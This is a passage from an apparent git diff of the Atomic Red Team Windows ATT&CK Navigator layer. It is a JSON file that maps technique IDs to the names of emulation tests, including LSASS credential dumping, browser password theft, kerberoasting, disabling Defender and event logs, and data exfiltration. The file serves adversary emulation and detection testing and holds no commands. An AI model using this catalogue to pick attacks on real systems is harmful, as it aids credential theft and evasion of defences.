Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":13,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":50,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":28,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender with Defender Control\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n"},{"techniqueID":"T1564.001","score":3,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":1,"enabled":true,"comment":"\n- Hidden Window\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":4,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1569","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":3,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":3,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Windows)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":37,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":12,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":2,"enabled":true,"comment":"\n- Query Registry\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-wmiobject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":3,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":1,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1033","score":5,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administive share with copy\n- Copy a sensitive File over Administive share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":4,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"comment":"\n- C2 Data Exfiltration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":6,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":9,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"comment":"\n- Process Injection via C#\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"comment":"\n- Process Hollowing using 